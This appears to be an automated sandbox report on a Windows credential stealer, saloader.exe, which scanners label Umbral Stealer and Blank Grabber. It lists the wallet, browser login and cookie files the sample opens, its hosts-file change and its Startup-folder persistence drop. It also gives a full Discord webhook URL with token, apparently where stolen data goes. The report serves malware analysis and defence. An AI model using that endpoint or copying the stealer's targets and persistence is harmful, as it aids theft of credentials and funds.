                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Users\user\Desktop\saloader.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Users\user\Desktop\saloader.exe | File written: C:\Windows\System32\drivers\etc\hosts

Stealing of Sensitive Information

Source: Yara match | File source: saloader.exe, type: SAMPLE
Source: Yara match | File source: 0.0.saloader.exe.2113d640000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.1924265199.000002113FA90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1924265199.000002113F4A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000000.1205880732.000002113D642000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1924265199.000002113F9E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1924265199.000002113F3F2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: saloader.exe PID: 520, type: MEMORYSTR
Source: Yara match | File source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\FRc7Z.scr, type: DROPPED

Source: Yara match | File source: saloader.exe, type: SAMPLE
Source: Yara match | File source: 0.0.saloader.exe.2113d640000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000000.1205880732.000002113D642000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: saloader.exe PID: 520, type: MEMORYSTR
Source: Yara match | File source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\FRc7Z.scr, type: DROPPED

Source: saloader.exe, 00000000.00000002.1924265199.000002113F9B4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: Electrum
Source: saloader.exe, 00000000.00000002.1924265199.000002113F9B4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: com.liberty.jaxx
Source: saloader.exe, 00000000.00000002.1924265199.000002113F9B4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: 7C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: saloader.exe, 00000000.00000002.1924265199.000002113F9B4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: 4C:\Users\user\AppData\Roaming\Ethereum\keystore
Source: saloader.exe, 00000000.00000002.1924265199.000002113F9B4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: Exodus
Source: saloader.exe, 00000000.00000002.1924265199.000002113F9B4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: Ethereum
Source: saloader.exe, 00000000.00000002.1924265199.000002113F9B4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: 8C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: saloader.exe, 00000000.00000002.1924265199.000002113F9B4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: keystore

Source: C:\Users\user\Desktop\saloader.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\saloader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\000003.log
Source: C:\Users\user\Desktop\saloader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\saloader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000003.log
Source: C:\Users\user\Desktop\saloader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log
Source: C:\Users\user\Desktop\saloader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\saloader.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data

Source: Yara match | File source: 00000000.00000002.1924265199.000002113F9B4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1924265199.000002113F3F2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: saloader.exe PID: 520, type: MEMORYSTR

Remote Access Functionality

Source: Yara match | File source: saloader.exe, type: SAMPLE
Source: Yara match | File source: 0.0.saloader.exe.2113d640000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.1924265199.000002113FA90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1924265199.000002113F4A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000000.1205880732.000002113D642000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1924265199.000002113F9E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1924265199.000002113F3F2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: saloader.exe PID: 520, type: MEMORYSTR
Source: Yara match | File source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\FRc7Z.scr, type: DROPPED

Source: Yara match | File source: saloader.exe, type: SAMPLE
Source: Yara match | File source: 0.0.saloader.exe.2113d640000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000000.1205880732.000002113D642000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: saloader.exe PID: 520, type: MEMORYSTR
Source: Yara match | File source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\FRc7Z.scr, type: DROPPED
MITRE ATT&CK matrix (the original 14-column table, listed per tactic; a leading number is the count shown in the original cell):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: 1 Windows Management Instrumentation; 11 Command and Scripting Interpreter; 1 PowerShell; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
Persistence: 1 DLL Side-Loading; 12 Registry Run Keys / Startup Folder; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Privilege Escalation: 1 DLL Side-Loading; 11 Process Injection; 12 Registry Run Keys / Startup Folder; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Defense Evasion: 1 File and Directory Permissions Modification; 21 Disable or Modify Tools; 11 Obfuscated Files or Information; 1 Timestomp; 1 DLL Side-Loading; 1 File Deletion; 11 Masquerading; 41 Virtualization/Sandbox Evasion; 11 Process Injection
Credential Access: 1 OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: 22 System Information Discovery; 111 Security Software Discovery; 1 Process Discovery; 41 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 11 Remote System Discovery; 11 System Network Configuration Discovery; System Owner/User Discovery; Network Sniffing
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
Collection: 1 Archive Collected Data; 2 Data from Local System; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Command and Control: 3 Ingress Tool Transfer; 11 Encrypted Channel; 4 Non-Application Layer Protocol; 5 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
Behavior graph (flattened): ID 1565502, Sample: saloader.exe, Startdate: 30/11/2024, Architecture: WINDOWS, Score: 100
Sample-level signatures: Malicious sample detected (through community Yara rule); Antivirus detection for dropped file; Antivirus / Scanner detection for submitted sample; 11 other signatures
saloader.exe (started)
    Network: ip-api.com 208.95.112.1, 49763, 80, TUT-ASUS, United States; discordapp.com 162.159.129.233, 443, 49813, 49819, CLOUDFLARENETUS, United States
    Dropped: C:\ProgramData\Microsoft\...\FRc7Z.scr (PE32); C:\Windows\System32\drivers\etc\hosts (ASCII); C:\Users\user\AppData\...\saloader.exe.log (ASCII); C:\ProgramData\...\FRc7Z.scr:Zone.Identifier (ASCII)
    Signatures: Suspicious powershell command line found; Found many strings related to Crypto-Wallets (likely being stolen); Self deletion via cmd or bat file; 7 other signatures
    -> powershell.exe (started): Loading BitLocker PowerShell Module
        -> WmiPrvSE.exe (started); conhost.exe (started)
    -> cmd.exe (started): Uses ping.exe to check the status of other devices and networks
        -> conhost.exe (started); PING.EXE (started)
    -> powershell.exe (started)
        -> conhost.exe (started)
    -> 8 other processes
        -> conhost.exe (started) x3; 5 other processes

Source | Detection | Scanner | Label
saloader.exe | 79% | ReversingLabs | ByteCode-MSIL.Trojan.UmbralStealer
saloader.exe | 75% | Virustotal |
saloader.exe | 100% | Avira | HEUR/AGEN.1307507
saloader.exe | 100% | Joe Sandbox ML |

Source | Detection | Scanner | Label
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\FRc7Z.scr | 100% | Avira | HEUR/AGEN.1307507
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\FRc7Z.scr | 100% | Joe Sandbox ML |
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\FRc7Z.scr | 79% | ReversingLabs | ByteCode-MSIL.Trojan.UmbralStealer
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\FRc7Z.scr | 82% | Virustotal |

No Antivirus matches

No Antivirus matches

Source | Detection | Scanner | Label
http://www.microsoft.co | 90% | Avira URL Cloud | safe
http://crl.microsoe | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
ip-api.com | 208.95.112.1 | true | false | | high
discordapp.com | 162.159.129.233 | true | false | | high

Name | Malicious | Antivirus Detection | Reputation
https://discordapp.com/api/webhooks/1310580388070031360/HcT5cAwFckSLk1OKu346uVDw7gzPyJJvcWmU8BKJrBQSUsE3Q1GCqDtVn5MK3JlldJBn | false | | high
http://ip-api.com/json/?fields=225545 | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
208.95.112.1 | ip-api.com | United States | 53334 | TUT-ASUS | false
162.159.129.233 | discordapp.com | United States | 13335 | CLOUDFLARENETUS | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1565502
Start date and time: 2024-11-30 02:28:06 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 21s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 37
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: saloader.exe
Detection: MAL
Classification: mal100.troj.adwa.spyw.evad.winEXE@37/24@2/2
EGA Information: Failed
HCA Information:
• Successful, ratio: 70%
• Number of executed functions: 247
• Number of non-executed functions: 0
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 172.217.17.67
• Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, gstatic.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target powershell.exe, PID 7308 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 7444 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 7636 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 7840 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 8048 because it is empty
• Execution Graph export aborted for target saloader.exe, PID 520 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may be missing behavior information.
• Report size exceeded maximum capacity and may be missing disassembly code.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
20:29:04 | API Interceptor | 33x Sleep call for process: powershell.exe modified
21:46:16 | API Interceptor | 241x Sleep call for process: saloader.exe modified
21:46:18 | API Interceptor | 4x Sleep call for process: WMIC.exe modified
Match: 208.95.112.1
Associated Sample Name / URL | Detection | Threat Name | Context
88851n80.exe | malicious | Unknown | www.ip-api.com/line/?fields=16401
file.exe | malicious | HackBrowser, Xmrig | ip-api.com/json
file.exe | malicious | Clipboard Hijacker | ip-api.com/line/
file.exe | malicious | Clipboard Hijacker | ip-api.com/line/
file.exe | malicious | XWorm | ip-api.com/line/?fields=hosting
file.exe | malicious | XWorm | ip-api.com/line/?fields=hosting
Enquiry.js | malicious | AgentTesla | ip-api.com/line/?fields=hosting
8FloezlGW7.exe | malicious | Python Stealer, Blank Grabber | ip-api.com/json/?fields=225545
Orden de compra.pdf______________________________________.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
Pedido_4502351226_de Compa#U00f1#U00eda Anno S.A..exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
Match: discordapp.com
Associated Sample Name / URL | Detection | Threat Name | Context
EsgeCzT4do.exe | malicious | XWorm | 162.159.129.233
file.exe | malicious | Unknown | 162.159.135.233
file.exe | malicious | CStealer | 162.159.134.233
https://cdn.discordapp.com/attachments/1284277835762110544/1305291734967779460/emu.exe?ex=67327f28&is=67312da8&hm=ea20e1c2a609dc1a0569bd4abb7e0da0a5e0671f3f7a388c1ed138f806c8e0c4& | malicious | Unknown | 162.159.135.233
RLesaPFXew.exe | malicious | SilverRat | 162.159.133.233
SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe | malicious | Xmrig | 162.159.135.233
segura.vbs | malicious | Remcos | 162.159.135.233
file.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc | 162.159.129.233
file.exe | malicious | LummaC, Amadey, LummaC Stealer, Quasar, Stealc | 162.159.134.233
LDlanZur0i.exe | malicious | Unknown | 162.159.135.233
Match: ip-api.com
Associated Sample Name / URL | Detection | Threat Name | Context
88851n80.exe | malicious | Unknown | 208.95.112.1
file.exe | malicious | HackBrowser, Xmrig | 208.95.112.1
file.exe | malicious | Clipboard Hijacker | 208.95.112.1
file.exe | malicious | Clipboard Hijacker | 208.95.112.1
file.exe | malicious | XWorm | 208.95.112.1
file.exe | malicious | XWorm | 208.95.112.1
Enquiry.js | malicious | AgentTesla | 208.95.112.1
8FloezlGW7.exe | malicious | Python Stealer, Blank Grabber | 208.95.112.1
https://www.scrolldroll.com/best-dialogues-from-asur/ | malicious | Unknown | 208.95.112.2
Orden de compra.pdf______________________________________.exe | malicious | AgentTesla | 208.95.112.1
Match: CLOUDFLARENETUS
Associated Sample Name / URL | Detection | Threat Name | Context
ONHQNHFT.msi | malicious | Unknown | 172.67.141.133
file.exe | malicious | LummaC Stealer | 172.67.165.166
file.exe | malicious | LummaC Stealer | 172.67.165.166
file.exe | malicious | Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Nymaim, Stealc, Vidar | 104.21.75.163
file.exe | malicious | HackBrowser, Xmrig | 104.16.123.96
https://thunderstore.io/package/download/Grad/HiddenUnits/1.3.0/ | malicious | Unknown | 104.26.14.210
file.exe | malicious | LummaC Stealer | 172.67.165.166
siveria.exe | malicious | CredGrabber, Meduza Stealer | 104.26.13.205
file.exe | malicious | LummaC Stealer | 172.67.167.249
file.exe | malicious | LummaC Stealer | 172.67.165.166
Match: TUT-ASUS
Associated Sample Name / URL | Detection | Threat Name | Context
88851n80.exe | malicious | Unknown | 208.95.112.1
file.exe | malicious | HackBrowser, Xmrig | 208.95.112.1
file.exe | malicious | LummaC, Amadey, Clipboard Hijacker, LummaC Stealer | 208.95.112.1
file.exe | malicious | Clipboard Hijacker | 208.95.112.1
file.exe | malicious | Clipboard Hijacker | 208.95.112.1
file.exe | malicious | XWorm | 208.95.112.1
file.exe | malicious | XWorm | 208.95.112.1
Enquiry.js | malicious | AgentTesla | 208.95.112.1
8FloezlGW7.exe | malicious | Python Stealer, Blank Grabber | 208.95.112.1
https://www.scrolldroll.com/best-dialogues-from-asur/ | malicious | Unknown | 208.95.112.2
Match: 3b5074b1b5d032e5620f69f9f700ff0e
Associated Sample Name / URL | Detection | Threat Name | Context
file.exe | malicious | HackBrowser, Xmrig | 162.159.129.233
https://thunderstore.io/package/download/Grad/HiddenUnits/1.3.0/ | malicious | Unknown | 162.159.129.233
file.exe | malicious | LummaC Stealer | 162.159.129.233
file.exe | malicious | Amadey, AsyncRAT, Cryptbot, DcRat, LummaC Stealer, Nymaim, Stealc | 162.159.129.233
file.exe | malicious | Stealerium | 162.159.129.233
file.exe | malicious | AsyncRAT, DcRat, Stealerium | 162.159.129.233
https://totspotdaynursery.co.uk/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1 | malicious | Unknown | 162.159.129.233
file.ps1 | malicious | LummaC Stealer | 162.159.129.233
Enquiry.js | malicious | AgentTesla | 162.159.129.233
stub.exe | malicious | Stealerium | 162.159.129.233
No context
Process: C:\Users\user\Desktop\saloader.exe
File Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 235008
Entropy (8bit): 6.050139535659894
Encrypted: false
SSDEEP: 6144:lloZMQfsXtioRkts/cnnK6cMldKRn/1+mpnsl3ySXCkb8e1muhi:noZItlRk83MldKRn/1+mpnsl3ySXze
MD5: 1E10AF7811808FC24065F18535CF1220
SHA1: 65995BCB862AA66988E1BB0DBFF75DCAC9B400C7
SHA-256: E07FD0AC793B06603BE164C9EE73465AF512CF17BED07614CBCD2A8410F04EED
SHA-512: F1C623918A3701254805E7648D671B316446A0F98637D3DE62D44331CF91502AFB57CCB762472491BC4AC037FBF5F7B624EB9D39092B3BE0B2ED84DA6F3ACADC
Malicious: true
Yara Hits:
• Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\FRc7Z.scr, Author: Joe Security
• Rule: JoeSecurity_UmbralStealer, Description: Yara detected Umbral Stealer, Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\FRc7Z.scr, Author: Joe Security
• Rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice, Description: Detects executables attempting to enumerate video devices using WMI, Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\FRc7Z.scr, Author: ditekSHen
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 79%
• Antivirus: Virustotal, Detection: 82%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l.a..........."...0.................. ........@.. ....................................`.................................L...O.......P...........................0................................................ ............... ..H............text........ ...................... ..`.rsrc...P...........................@..@.reloc..............................@..B........................H.......@...........6.....................................................{....*..{....*V.(......}......}....*...0..A........u........4.,/(.....{.....{....o....,.(.....{.....{....o....*.*.*. ... )UU.Z(.....{....o....X )UU.Z(.....{....o....X*...0..b........r...p......%..{.......%q.........-.&.+.......o.....%..{.......%q.........-.&.+.......o.....(....*...0..w.............%.o...(.........~....s..........]..........~.....".".~.....\.\.~......b.~.......f.~.......n.~.......r.~...
Process: C:\Users\user\Desktop\saloader.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 26
Entropy (8bit): 3.95006375643621
Encrypted: false
SSDEEP: 3:ggPYV:rPYV
MD5: 187F488E27DB4AF347237FE461A079AD
SHA1: 6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256: 255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512: 89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious: true
Preview: [ZoneTransfer]....ZoneId=0
Process: C:\Users\user\Desktop\saloader.exe
File Type: ASCII text, with CRLF line terminators
Category: modified
Size (bytes): 1965
Entropy (8bit): 5.377802142292312
Encrypted: false
SSDEEP: 48:MxHKQ71qHGIs0HKCYHKGSI6owHptHTHhAHKKkpLHDJHqHGHK+HKs:iq+wmj0qCYqGSI6owJtzHeqKkpLVKmqs
MD5: 582A844EB067319F705A5ADF155DBEB0
SHA1: 68B791E0F77249BF83CD4B23A6C4A773365E2CAD
SHA-256: E489CF4E6C01EFE8827F172607D7E3CD89C4870B0B0CA5A33EFE64577E2CB8A9
SHA-512: 6F530A0E2D3910459AFEFD0295ACA93D3814AB98D9A6E2BE1C2B8B717F075C87EF908BBF955E38F7B976EC51ED512645D13D0FB60AC865867E573060C5D76B59
Malicious: true
                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Net.Http, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):64
                                                                                        Entropy (8bit):0.34726597513537405
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Nlll:Nll
                                                                                        MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                        SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                        SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                        SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                        Malicious:false
                                                                                        Preview:@...e...........................................................
                                                                                        Process:C:\Users\user\Desktop\saloader.exe
                                                                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                        Category:dropped
                                                                                        Size (bytes):655149
                                                                                        Entropy (8bit):7.998085670924382
                                                                                        Encrypted:true
                                                                                        SSDEEP:12288:Muw0pD+akiaWVbvfhh7f3DWfRZGmlH7vvVVuC/llsQBHsXh0FjCUAJGbeznz:/WakybvZ1rWHGuv3llPBMXh8jCUAgbe3
                                                                                        MD5:4B293D7EAD641D53CF87E4DBBFDD25CD
                                                                                        SHA1:1C58FB49749488437FA417B3BF906CE154246589
                                                                                        SHA-256:B3929DC65BB773A43AA115D93B0312FBC864AA955ACAD842BD27EE32C937A54D
                                                                                        SHA-512:0B68F070B5C05FB80799D33CEEEF24D5CFB7FCFD51E4562F4C7E1A46BB6FDA66AB7CF2C6DD27A260D59BEDBFB849A6D80166E5086DDE3F0B6168025745208548
                                                                                        Malicious:false
